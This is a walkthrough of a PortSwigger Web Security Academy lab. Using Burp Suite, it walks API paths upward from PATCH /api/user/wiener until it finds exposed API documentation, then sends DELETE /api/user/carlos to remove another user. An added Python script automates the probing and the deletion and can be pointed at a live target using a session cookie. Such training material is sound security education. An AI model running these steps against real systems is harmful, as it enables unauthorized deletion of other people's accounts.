Lab: Exploiting an API endpoint using documentation
After starting the exercise, the shop's home page opens. Click on the My account link to open the login form and enter the credentials the lab provides: user name wiener, password peter.

The login form is shown in the next picture.

In our account we see our user name and email address, along with a form for changing the email address.

We will now change our email address to hacker1@hackerone.org.

We now switch to Burp Suite, open Burp Proxy and select the HTTP history tab.

In the HTTP history we look for the request PATCH /api/user/wiener, which the email change triggered, and send it to Burp Repeater.

To do this, right-click the request and choose Send to Repeater from the context menu.

We now switch to Burp Repeater and send the request PATCH /api/user/wiener to the application again. In the Response section we see that the API returns the user record for wiener, so the endpoint accepts the request and our session is valid.

In our request we remove wiener from the first line, so the request line reads PATCH /api/user.
If we send this request, we receive an HTTP/2 400 Bad Request response. The response body tells us why: an identifier was expected but not supplied. This is useful information in itself, because a 400 with an explanatory message means the route /api/user exists and merely lacks a parameter, whereas a route that is not mounted would typically answer 404.
Now we also remove /user from the path, so the request line reads PATCH /api.
When we send this request, we receive an HTTP/2 302 Found response.
In Burp Repeater, click on the Follow redirection button to see where the redirect leads.

Now move the mouse to the Response section and right-click, then select the option Show response in browser.

A window will open where we click on the Copy button.

Now open a new tab in your browser and paste the link you just copied. You will see the API documentation, which lists the endpoints under /api, including the DELETE endpoint for a user. With it we can delete the user carlos.

Back in Burp Repeater we adjust our request so that the request line reads DELETE /api/user/carlos. The complete request looks like this.
When we send this request, we receive an HTTP/2 200 OK response, and the response body confirms that the user carlos has been deleted.
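The manual Repeater steps above, automated as an added example (not part of the PortSwigger lab or of Burp): starting from the known PATCH /api/user/wiener request, strip one path segment at a time, record which parents answer 400 (route exists, parameter missing) versus 302/200 (something is mounted there), follow the redirect to the documentation, and then call the DELETE endpoint. The lab_stub function is a constructed offline stand-in that reproduces the responses described in this walkthrough; http_sender runs the same logic against a live target, and its lab URL and session cookie are placeholders you replace with your own.

```python
"""Walk a known API path upwards to find undocumented parent routes.

Added example for this walkthrough; not code from the lab or from Burp.
"""
import http.client
import json
from urllib.parse import urlparse


def parent_paths(path):
    """Yield the parents of a path, nearest first: /api/user/wiener -> /api/user -> /api -> /."""
    segments = [s for s in path.split("/") if s]
    while segments:
        segments.pop()
        yield "/" + "/".join(segments)


def probe_parents(send, start_path, method="GET"):
    """Send `method` to each parent of start_path until one answers 2xx/3xx.

    Returns a list of (path, status, location) tuples. A 400 is kept because an
    error about a missing identifier proves the route exists; a 404 would mean
    nothing is mounted at that path.
    """
    hits = []
    for path in parent_paths(start_path):
        status, headers, _ = send(method, path)
        hits.append((path, status, headers.get("Location")))
        if 200 <= status < 400:
            break
    return hits


def fetch_docs(send, hits):
    """Follow the redirect of the first 3xx hit and return (status, body)."""
    for _, status, location in hits:
        if 300 <= status < 400 and location:
            status, _, body = send("GET", location)
            return status, body
    return None, None


def delete_user(send, username):
    """Call the DELETE endpoint the documentation lists; returns the status code."""
    status, _, _ = send("DELETE", f"/api/user/{username}")
    return status


def http_sender(base_url, session_cookie):
    """Build a send(method, path, body=None) callable for a live target.

    http.client does not follow redirects on its own, which is what we want
    when mapping routes. base_url and session_cookie are placeholders: the lab
    URL and the session cookie copied from Burp.
    """
    target = urlparse(base_url)
    conn_cls = http.client.HTTPSConnection if target.scheme == "https" else http.client.HTTPConnection

    def send(method, path, body=None):
        conn = conn_cls(target.netloc, timeout=10)
        headers = {"Cookie": f"session={session_cookie}", "Accept": "application/json"}
        data = None
        if body is not None:
            data = json.dumps(body).encode()
            headers["Content-Type"] = "application/json"
        conn.request(method, path, body=data, headers=headers)
        resp = conn.getresponse()
        text = resp.read().decode(errors="replace")
        conn.close()
        return resp.status, dict(resp.getheaders()), text

    return send


def lab_stub(method, path, body=None):
    """Constructed offline stand-in reproducing the responses seen in the walkthrough."""
    if path == "/api/user":
        return 400, {}, '{"error": "identifier expected"}'   # route exists, parameter missing
    if path == "/api":
        return 302, {"Location": "/api/"}, ""
    if path == "/api/" and method == "GET":
        return 200, {"Content-Type": "text/html"}, "API documentation: DELETE /api/user/{username}"
    if method == "DELETE" and path.startswith("/api/user/"):
        return 200, {}, '{"status": "deleted"}'
    return 404, {}, ""


if __name__ == "__main__":
    # For a live run: send = http_sender("https://YOUR-LAB-ID.web-security-academy.net", "<session cookie>")
    send = lab_stub
    hits = probe_parents(send, "/api/user/wiener", method="PATCH")
    for path, status, location in hits:
        print(f"{path:<12} -> {status} {location or ''}")
    print("docs:", fetch_docs(send, hits))
    print("DELETE carlos ->", delete_user(send, "carlos"))
```

When you point http_sender at the real lab, keep the PATCH method for the probe as shown: the walkthrough never tested whether GET /api/user behaves the same way, and some APIs route different methods to different handlers.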
The following message appears in the browser.

We have successfully completed the exercise.